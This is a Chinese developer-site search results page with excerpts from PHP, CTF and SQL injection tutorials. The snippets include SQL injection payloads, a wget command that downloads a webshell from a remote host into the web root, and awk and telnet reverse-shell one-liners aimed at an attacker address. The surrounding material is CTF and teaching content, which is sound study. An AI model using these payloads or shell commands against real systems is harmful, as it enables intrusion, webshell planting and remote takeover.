首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    PHP- 控制流-循环语句-do...while(二)

    嵌套do...while循环您也可以在do...while循环内部嵌套另一个do...while循环,以实现更复杂的逻辑。下面是一个示例,使用嵌套的do...while循环来生成一个九九乘法表:ephp$i = 1;do { $j = 1; do { echo $i . ' × ' . $j . ' = ' . $i * $j ....总结do...while循环是PHP中的一种重复执行语句,它会先执行一次循环体,然后再检查条件表达式的值。和while循环不同的是,do...while循环至少会执行一次循环体。...您可以在循环体内部使用break和continue语句,以便控制循环的执行流程。您也可以在do...while循环内部嵌套另一个do...while循环,以实现更复杂的逻辑。...当您需要重复执行某个任务,但又无法确定执行次数时,do...while循环是一个非常有用的工具。

    53930

    BUUCTF-Web-WriteUp

    输入1' #显示正常 应该是存在sql注入了 输入1' or '1'='1,正常回显,应该是字符型 0x02:猜解SQL查询语句中的字段数 输入1' order by 1 # 成功回显 输入...1' order by 2 # 成功回显 输入1' order by 3 # 回显错误 所以只有两个字段 0x03:显示字段 输入1′ union select 1,2 # 回显一个正则过滤规则...尝试堆叠注入 0x04:查询数据库 输入1';show databases;# 成功回显 说明存在堆叠注入 0x05:查询表 输入1';show tables;# 成功回显 得到两个表words...word这张表中回显的,那我们怎么才能让它回显flag所在的表呢 内部查询语句类似 :select id, data from word where id = 他既然没过滤 alert 和 rename...将where替换成hacker,就可以将这个成员的最后一个字符挤出去,重复34次就可以挤出34个字符,正好闭合改序列化字符串 ---- 打开题目,典型的登录界面 猜测是否有注册,发现/register.php

    1.5K20

    SQL注入的几种类型和原理

    注意:UNION操作符选取不重复的值。如果允许重复的值,请使用 UNION ALL。 ?...报错注入 原理 接下来的文字会省略一些,因为找到对应的回显之后,整个过程类似。无论是那种类型的注入,本质上是SQL语句被执行之后寻找对应的回显。...对于报错,回显在错误中,后面的的时间注入,回显在时间的判断中,DNSlog盲注中,回显在DNSlog中。 报错注入如何发生的? 构造payload让信息通过错误提示回显出来 什么场景下有用?...布尔盲注 原理 布尔盲住指得是代码存在SQL注入漏洞,但是页面既不会回显数据,也不会回显错误信息,只返回 ”Right“ 和 ”Wrong”。...时间盲注 原理 时间盲注:代码存在SQL注入漏洞,然而页面即不会回显数据,也不会回显错误信息,语句执行之后不提示真假,不能通过页面来进行判断。通过构造语句,通过页面响应的时长来判断信息。

    5.4K52

    BUU-WEB-第二章

    [SUCTF 2019]EasySQL image.png 我们先输入1,返回有回显。 image.png 继续测试其它字符,发现输入数字都有回显,但是如果输入的是字母,则没有回显。...1.报错注入 1' 输入:1' 没有回显,应该是存在SQL注入,但是关闭了错误回显,所以报错注入是行不通了。...1.输入非零数字得到的回显1和输入其余字符得不到回显=>来判断出内部的查询语句可能存在|| 2.即select输入的数据||内置一个列名 from 表名=>即为 select post进去的数据||flag...[回显成功][7] 同理我们刚刚尝试过:1;show tables 同样得到了回显。 但是show columns from Flag就不行。...image.png 有回显,我们在在后边继续执行语句,先查看一下ls; image.png 这里发现终端有一个flag.php和一个Index.php,cat flag.php一下试一试 image.png

    1.3K40

    SQL注入基础教程

    指定id=-1或者一个很大的值,使第一条语句无法查询到数据。 所以我们输入下面的SQL语句干扰正常的查询: 可以回显的到admin表中的全部数据,从而获得了网页的后台管理权限。...例题 题目来源:CTFHUB 我们输入数字1,得到回显。 根据题意,知道这是个整数型注入,所以我们可以直接爆破表名。...from flag#' 在前端得到回显,得到flag。...布尔盲注和时间盲注 布尔盲注和时间盲注 布尔盲注简述 布尔盲注一般适用于页面没有回显字段,不支持联合查询,且web页面返回true 或者 false,构造SQL语句,利用and,or等关键字来使其后的语句...报错原理:利用数据库表主键不能重复的原理,使用group by分组,产生主键冗余,导致报错。

    41950

    命令执行之文件落地利用总结

    0x02 Linux (1) 目标出网,命令有回显 如果目标主机可以出网,并且执行命令有回显,这时我们就可以直接通过执行以下命令来获取目标网站的绝对路径,然后再利用以下多种方式写入或下载Webshell...http://192.168.1.120/shell.txt -O /var/www/html/shell.php (2) 目标出网,命令无回显 如果目标主机可以出网,但执行命令无回显,这时我们可以通过执行以下命令使用...,命令无回显 如果目标主机不能出网,并且执行命令无回显,这时我们可以通过执行以下命令先遍历出1653042293000.png文件的绝对路径,然后再次遍历该文件绝对路径,或者将Webshell写入到该文件同级目录下...$f)/shell.php;done 0x03 Windows (1) 目标出网,命令有回显 如果目标主机可以出网,并且执行命令有回显,这时我们可以通过执行dir、where、for、finstr.../shell.asp (3) 目标不出网,命令无回显 如果目标主机不能出网,并且执行命令无回显,这时我们可以通过执行以下命令将找到的1653042293000.png文件绝对路径,或者将Webshell

    1.1K20

    从一道题目中学习反弹shell

    > 这里可以看出是命令执行类的题目,但是一些关键词被ban了,例如php被ban,因此这里的话想用PHP://伪协议读取flag就不行了,想写一句话木马的话虽然可以用=代替php,但因为这里$了,所以也不行...,那么这里的思路我的话感觉是还有两种,一种是利用重定向符,他这里输出是无回显的,我们可以把他写到一个文件中,然后访问这个文件来查看回显,因此payload如下 cmd=ls />a 接下来访问xxx/a...目标机,调用awk语句,具体如下 awk 'BEGIN{s="/inet/tcp/0/xxx.xxx.xxx.xxx/7777";for(;s|&getline c;close(c))while(c|getline...,此时实现了攻击机port端口执行的语句,在port2端口可以看到回显信息 第二种方式 先给出参考payload mknod a p; telnet xxx.xxx.xxx.xxx port 0a,就是将标准输出重定向到a,这个时候就实现了标准输入和输出都在同一个管道下 demo 攻击机 监听两个端口,一个用于执行指令,一个用于查看回显

    64110

    BUUCTF 刷题笔记——Basic 2

    数字为 2 时浏览器能够正常回显,说明当前 SQL 语句至少查询了两列数据。 图片 当数字修改为 2 时浏览器无回显,说明当前 SQL 语句仅查询了两列数据。...图片 接下来判断回显位,即测试有几列数据可以回显至浏览器中,构造 payload 如下: id=-1 union select 1,2--+ 其中 id 赋值为 -1是为了使当前查询语句前半句查找失败...当然,后面的数字序列可以为任意数字,因为该查询语句并没有向任何数据块查询,而是直接返回后方的数字序列。因此我们可以利用此来判断几列数据可用于回显。...此前已知语句查询两列数据,而使用上述 payload 浏览器可以正常回显,可知查询的两列数据均可用于回显。 图片 害本来就是显示两组数据,不用测试都可以知道,不过这里还是练习一下。...后部分查找语句中查找了两个部分,对应于可供回显的两部分数据,现在只需确认有哪些数据库,因此只需使用一部分数据,另一部分直接使用数字填充即可。

    2.6K50

    SQL注入详谈

    其成因可以归结以下两个原因叠加造成的: 1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造 SQL 语句 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到 SQL 语句中。...Boolean-based blind SQL injection(布尔型注入) Time-based blind SQL injection(基于时间延迟注入) SQL 注入挖掘 and 1=1 和 and 1=2 回显页面不同...(整形判断) 单引号判断 ‘ 显示数据库错误信息或者页面回显不同(整形,字符串类型判断) (转义符) -1/+1 回显下一个或上一个页面(整型判断)(需要用%2b 转码+号) and sleep(5)...>' INTO OUTFILE ' D://phpStudy//WWW//hack.php ' MySQL 中 UNION 规则 UNION 必须由两条或两条以上的 SELECT 语句组成,语句之间用关键字...UNION 会从查询结果集中自动去除了重复行。

    65220

    代码审计原理与实践分析-SQL篇(一)

    ; Sql_2 = select * from wp_terms; 回显如下: 如果使用联合查询: Sql = select * from wp_terms where term_id = 1 union...select 1,user_login,3,4 from wp_users; 回显如下: 这是MySQL数据库的基本知识,不在赘述。...需要注意的是,该漏洞必须抓包才可以看到回显的数据,因为请求pay.php页面后,会自动跳转到阿里支付的页面。...只需要加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确。 时间型注入和布尔型注入的的简单代码类似,因此就不再重复赘述。...> 代码实例比较简单,params变量为重写的GET和POST请求,在这里idlist参数通过GET的方式获得传入的数值,经过字符判断,数组分割,再剔除无用数据,判断有无重复值,然后直接拼接到SQL语句

    65020
    领券